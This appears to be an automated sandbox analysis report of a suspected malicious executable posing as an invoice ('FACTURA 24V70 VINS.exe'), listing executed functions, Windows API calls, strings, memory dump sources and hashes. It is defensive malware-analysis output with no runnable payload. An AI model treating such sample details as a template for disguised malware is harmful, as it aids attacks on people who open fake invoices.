Opcode Fuzzy Hash: b3f0a4727c4b8e39bae5f5b516e2bdfa50cde8a9b43bef11aa4a2d62f0cd0630
Instruction Fuzzy Hash: FC4174B5E016599FDB08CFEAD9446AEFBF2AF88300F14C12AD419AB254DB345946CF80

Analysis Process: FACTURA 24V70 VINS.exePID: 3384, Parent PID: 5016COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5.4%
Signature Coverage:	3.8%
Total number of Nodes:	130
Total number of Limit Nodes:	10

Executed Functions

Function 00417853 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 97e9fe6c8324f571666f247c4b1aaab24dd5beb3ee3716f42024a6bd9ad30d99
Instruction ID: 1647c25763fa882388c1b3bad9fec31322f1b96d04710fe64eaf1074e0a214f6
Opcode Fuzzy Hash: 97e9fe6c8324f571666f247c4b1aaab24dd5beb3ee3716f42024a6bd9ad30d99
Instruction Fuzzy Hash: 420152B1E4010DA7DB10EAE5DC42FDEB3789B54308F4041A6E90897240F634EB48CB95

Function 0042C5F3 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C62A

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3abc973a75475fabfc7bb3d636dbc602c79d53bb3a703b95ff2466499fa64ebb
Instruction ID: de575387b056b1f14485e425c9db8aa5691c10ad9d7487fc49cbd0ae8a3d7629
Opcode Fuzzy Hash: 3abc973a75475fabfc7bb3d636dbc602c79d53bb3a703b95ff2466499fa64ebb
Instruction Fuzzy Hash: B4E04F366002147BC210BBAADC01F9B776CDBC5714F40441AFA1C67241C674B91187A5

Function 01772B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01772B6A

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
Instruction ID: 2c70833671dfb32b01ea2dfc702273ee7d3842cf8d6637c7090005d255ad0981
Opcode Fuzzy Hash: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
Instruction Fuzzy Hash: 3690026124640003420571584454616D00B97E0311B95C031E10145A4DC5258A916227

Function 01772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01772DFA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
Instruction ID: 82cb42a798e53888c0339abc77963482317e4098285361a47779c40605a01015
Opcode Fuzzy Hash: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
Instruction Fuzzy Hash: 0790023124540413D21171584544707900A97D0351FD5C422A042456CDD6568B52A223

Function 01772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01772C7A

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
Instruction ID: fabb5ec443e4d2e96ba3d2c2f1dc189f7c6b497415f299f06ccb8b611d5b8580
Opcode Fuzzy Hash: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
Instruction Fuzzy Hash: 7490023124548802D2107158844474A900697D0311F99C421A442466CDC6958A917223

Function 017735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017735CA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
Instruction ID: 5a6a5f4da644db9e3a020c544c58c31cb8f4e9c20a8af636046f37b102092ec6
Opcode Fuzzy Hash: 02c26e0fe57a96309fd763ccf8a5b721ccce3e81825094e2a7cbf3bd91ed12ac
Instruction Fuzzy Hash: 8E90023164950402D20071584554706A00697D0311FA5C421A042457CDC7958B5166A3

Function 00414164 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 0041414A

Strings

n-T73hKo, xrefs: 0041413F, 00414149, 0041415A
n-T73hKo, xrefs: 00414151, 00414154

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: 7a67b3d31a20abe3c3f41ff3bb49d7b4f7b8a07af5e7f9b9a19b8e283edcb307
Instruction ID: e58d3e881cbba94ac5971694da36e32d9cc1284c51af923471e8fcc688805be7
Opcode Fuzzy Hash: 7a67b3d31a20abe3c3f41ff3bb49d7b4f7b8a07af5e7f9b9a19b8e283edcb307
Instruction Fuzzy Hash: AD119E7180025839D7205AB48C85CEF772CDE963A8B45829EF9149B2D2C6384DC3C769

Function 004140CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 0041414A

Strings

n-T73hKo, xrefs: 0041413F, 00414149, 0041415A
n-T73hKo, xrefs: 00414151, 00414154

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: 5e52d8ccd4115835654c5cb4da331b5d129bdf23ce2bb7c917852fa60b19e22e
Instruction ID: 3dc68589fa15765d2e27ff2690ed8317fcc209163803a2e087d5452f4dc5e720
Opcode Fuzzy Hash: 5e52d8ccd4115835654c5cb4da331b5d129bdf23ce2bb7c917852fa60b19e22e
Instruction Fuzzy Hash: A601E5B1D0011C7ADB11AAE19C82DEF7B7CDF81798F408069FA1477241D1784E0787B1

Function 004140D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 0041414A

Strings

n-T73hKo, xrefs: 0041413F, 00414149, 0041415A
n-T73hKo, xrefs: 00414151, 00414154

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: 4eb8d484e18440c8967ac9bbfd0f3c8d9d6681948c255de35238259a75f4a347
Instruction ID: 2d6bab10110b35820cb55a40ebe17f29fbdb0cb91d3a56e18d8d89b05da51665
Opcode Fuzzy Hash: 4eb8d484e18440c8967ac9bbfd0f3c8d9d6681948c255de35238259a75f4a347
Instruction Fuzzy Hash: CF01D6B2D0011C7ADB11A7E19C82DEF7B7CDF81798F40806AFA1477241D5784E0687B5

Function 0041409B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(n-T73hKo,00000111,00000000,00000000), ref: 0041414A

Strings

n-T73hKo, xrefs: 0041413F, 00414149, 0041415A
n-T73hKo, xrefs: 00414151, 00414154

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: n-T73hKo$n-T73hKo
API String ID: 1836367815-874472120
Opcode ID: de90107d73dae3194c0923b66df4030d4d7d3f550c6b223fe6a141ac51df277e
Instruction ID: 3198ddab98251860233cfc492f319c9ba38136b0211f2a68a2d3c81832d03691
Opcode Fuzzy Hash: de90107d73dae3194c0923b66df4030d4d7d3f550c6b223fe6a141ac51df277e
Instruction Fuzzy Hash: F6014772A0501C7BD7115AD9BC82DEEB3ACEF96754B0081ABF918EB200D1294D8247A6

Function 0042C973 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B55E010,00000007,00000000,00000004,00000000,004170D5,000000F4), ref: 0042C9AF

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5960710d06a8f1263c0b4ddeef96bf0f4564d65c08ab4d77bcfe43908da967f5
Instruction ID: 3a400c9db85bd27f53db1ec0d6346f8218fb82dbd9228647cc4c8c158bc473a2
Opcode Fuzzy Hash: 5960710d06a8f1263c0b4ddeef96bf0f4564d65c08ab4d77bcfe43908da967f5
Instruction Fuzzy Hash: DEE06DB2600244BBD614EEA9DC41F9B73ACEFC5710F00441AFE18A7242C774B911CAB9

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E5DB,?,?,00000000,?,0041E5DB,?,?,?), ref: 0042C95F

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2a42f8c2c7972597a9eea4f72867f0c54a7aa421d8e554d6c8e8f46347cab59c
Instruction ID: 59b6fb0b63d4156c228d0c00aa8a8d8c660061d27db57e23cd9701ce233b646a
Opcode Fuzzy Hash: 2a42f8c2c7972597a9eea4f72867f0c54a7aa421d8e554d6c8e8f46347cab59c
Instruction Fuzzy Hash: 98E06D726002047BD610EE9ADC41FAB73ACEFC9714F00441AFD08A7241C770B910CAB9

Function 00417904 Relevance: 1.5, APIs: 1, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178C5

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 6ca93875e4dc460d27addc84185143aecd470d2f18ddab83da9d2ae55e456c2e
Instruction ID: b47f2bec227c9179dddef85c3a8ec337aaddc0e9d37ac73c3233be08c3788615
Opcode Fuzzy Hash: 6ca93875e4dc460d27addc84185143aecd470d2f18ddab83da9d2ae55e456c2e
Instruction Fuzzy Hash: D2E065B1E1010DABDB50DB95DC41F9DB7B4EB54308F00859AE9089B201F635EB59CB55

Function 0042C9C3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,RZ?,?,?,RZ?), ref: 0042C9FA

Memory Dump Source

Source File: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FACTURA 24V70 VINS.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 211a476c7bdbf6291a000bc796f038d391e1d2ecfc497159d2c52f0a7322fc90
Instruction ID: 5175699b60a9ddce563439c19ffde34440841e7d4169f34d9330184fc88f5c40
Opcode Fuzzy Hash: 211a476c7bdbf6291a000bc796f038d391e1d2ecfc497159d2c52f0a7322fc90
Instruction Fuzzy Hash: 5EE04F366002147BC210BA9ADC01F97B76CDBC5714F80841AFA0867282C770B90187B5

Function 01772C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01772C24

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
Instruction ID: 7fe65e61980c790fdd4b1a34f6346f066874f608441069daf3ea2630a6eb2d2c
Opcode Fuzzy Hash: 6575b6a84f96634bcab2904b3970ac6f48dc01f298106a71029f58955a9f8f03
Instruction Fuzzy Hash: D3B04C719455C585DB11A7644608616B9056790711F55C461D2120655B47288191E276

Non-executed Functions

Function 017B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

Initializing the application verifier package failed with status 0x%08lx, xrefs: 017B3176
CFGOptions, xrefs: 017B2967
DisableHeapLookaside, xrefs: 017B246D
RaiseExceptionOnPossibleDeadlock, xrefs: 017B2579
GlobalFlag2, xrefs: 017B2FC0
TracingFlags, xrefs: 017B2549
MinimumStackCommitInBytes, xrefs: 017B2BB0
MaxDeadActivationContexts, xrefs: 017B2D82
@, xrefs: 017B2B74
MaxLoaderThreads, xrefs: 017B24EC
UseImpersonatedDeviceMap, xrefs: 017B251C
DisableExceptionChainValidation, xrefs: 017B275F
@, xrefs: 017B2942
FrontEndHeapDebugOptions, xrefs: 017B2489
UnloadEventTraceDepth, xrefs: 017B24C0
minkernel\ntdll\ldrinit.c, xrefs: 017B3187
ShutdownFlags, xrefs: 017B24A1
GlobalFlag, xrefs: 017B2F3F, 017B3059
LdrpInitializeExecutionOptions, xrefs: 017B317D
ExecuteOptions, xrefs: 017B25A0

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
Instruction ID: 99df3b53211d3110d2a0f49f17bfdf4674f7031a13b9f40ef0d4e118e72fe0a1
Opcode Fuzzy Hash: 54dc8d8750f8f93644b042d4546975076c62fc053ef43edcbeae31529eb57e9c
Instruction Fuzzy Hash: 37928F71609742AFE721DF28C884BABF7E8BB88754F04492DFA94D7252D770E844CB52

Function 01768620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section address, xrefs: 017A5425, 017A54BC, 017A5534
Critical section debug info address, xrefs: 017A541F, 017A552E
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54E2
Critical section address., xrefs: 017A5502
undeleted critical section in freed memory, xrefs: 017A542B
8, xrefs: 017A52E3
Thread is in a state in which it cannot own a critical section, xrefs: 017A5543
corrupted critical section, xrefs: 017A54C2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A540A, 017A5496, 017A5519
Thread identifier, xrefs: 017A553A
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A54CE
Address of the debug info found in the active list., xrefs: 017A54AE, 017A54FA
double initialized or corrupted critical section, xrefs: 017A5508
Invalid debug info address of this critical section, xrefs: 017A54B6

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
Instruction ID: f32b1a927204cf677fd89d60692bda691fb6cd9bf609df1d862a57d6ade333b3
Opcode Fuzzy Hash: 958ccb85619642552943df4208f6550a26c90799a88a150a013a9e60b7ba59a4
Instruction Fuzzy Hash: 9681BDB0A40358EFDB20CF99C895BAEFBB9FB48B04F644259F904B7241D375A941CB61

Function 017629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A2624
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A2602
@, xrefs: 017A259B
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2409
RtlpResolveAssemblyStorageMapEntry, xrefs: 017A261F
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A25EB
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A24C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2506
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A2498
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A2412
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A22E4

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
Instruction ID: 2ad09adaf471c9177c6007789209febafa29952d00ab99ef055ce9a0a7b660b3
Opcode Fuzzy Hash: 0c629e0c7d23a55adf6a79990b19d208256e9ef7cfb4445f46e64001f8bc9791
Instruction Fuzzy Hash: 580260F1D042299FDB61DB58CC84BD9F7B8AF54704F4041EAEA09A7246EB309E84CF59

Function 017D8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

services.exe, xrefs: 017D8B96
lsass.exe, xrefs: 017D8BA1
heapType, xrefs: 017D8BCB
SegmentHeap, xrefs: 017D8BE9
smss.exe, xrefs: 017D8B8B
svchost.exe, xrefs: 017D8B68
csrss.exe, xrefs: 017D8B80
DefaultBrowser_NOPUBLISHERID, xrefs: 017D8D00
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 017D8BD0
runtimebroker.exe, xrefs: 017D8B73

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
Instruction ID: 0d18d2d492c18af44e0c4f2dfe6155ea2fdfaae2242e02b77eb54663a6e16dce
Opcode Fuzzy Hash: cdb41ab25756f40adc571fa70da0b825345937b8b6efad803b5f9ad33b789c13
Instruction Fuzzy Hash: F751B1B15043499BD72ACF188848BABFBFCEF98240F14496DE999C3285E770D644C7A3

Function 017E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 017E03A6, 017E04B5, 017E05DD, 017E0682, 017E06D9
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017E06EA
About to reallocate block at %p to %Ix bytes, xrefs: 017E03BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 017E069F
RtlReAllocateHeap, xrefs: 017E02BF, 017E0362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017E04D3
HEAP[%wZ]: , xrefs: 017E0399, 017E04A8, 017E05D0, 017E0675, 017E06CC
Just reallocated block at %p to %Ix bytes, xrefs: 017E05F1

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
Instruction ID: e39d6498ded979dd95c65608d5cb0a959879735f34ad87a27d4144fb6c2c5f82
Opcode Fuzzy Hash: 77bee1739ba5727df444823c406e7e2c897998704e1007fa657d86f145445e4f
Instruction Fuzzy Hash: 58D1CD71604686DFDB22DFA8C458AADFBF1FF5A710F188059F8859B252C7B49942CF20

Function 017B89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
VerifierFlags, xrefs: 017B8C50
VerifierDlls, xrefs: 017B8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
VerifierDebug, xrefs: 017B8CA5
HandleTraces, xrefs: 017B8C8F

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
Instruction ID: 10a4b55e2e1db1d08582ee9805034e28485ca7f8c4b41ae67e9f1755c32801e1
Opcode Fuzzy Hash: fb78b65cf1f9506f30299967dd693979767afd334342d2d014224e03d77dacff
Instruction Fuzzy Hash: 7C9126B1645312AFD722DF28C8D4BEBF7A8EB54B14F444499FA45AB284C7309E40CB96

Function 017663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017A41FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017A40D8
Process initialization failed with status 0x%08lx, xrefs: 017A413A
Delaying execution failed with status 0x%08lx, xrefs: 017A4258
minkernel\ntdll\ldrinit.c, xrefs: 017A40E9, 017A414B, 017A420F, 017A4269
_LdrpInitialize, xrefs: 017A40DF, 017A4141, 017A4205, 017A425F

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
Instruction ID: 8910bd41c6e0460e0325ea7e6f139ab24d685e7df5e0910dd1847fc6e4ddad1e
Opcode Fuzzy Hash: 78238a1d44d27ffe0002f717b57b70984313b6c219e9e83e607d6f657a45742b
Instruction Fuzzy Hash: A6916970B003159BDB36DF18D858BAAFBA5FB80B14F944228FE02672C5D7B59A01CB90

Function 0172645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim user DLL failed with status 0x%08lx, xrefs: 01789A2A
apphelp.dll, xrefs: 01726496
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
Getting the shim user exports failed with status 0x%08lx, xrefs: 01789A01
minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

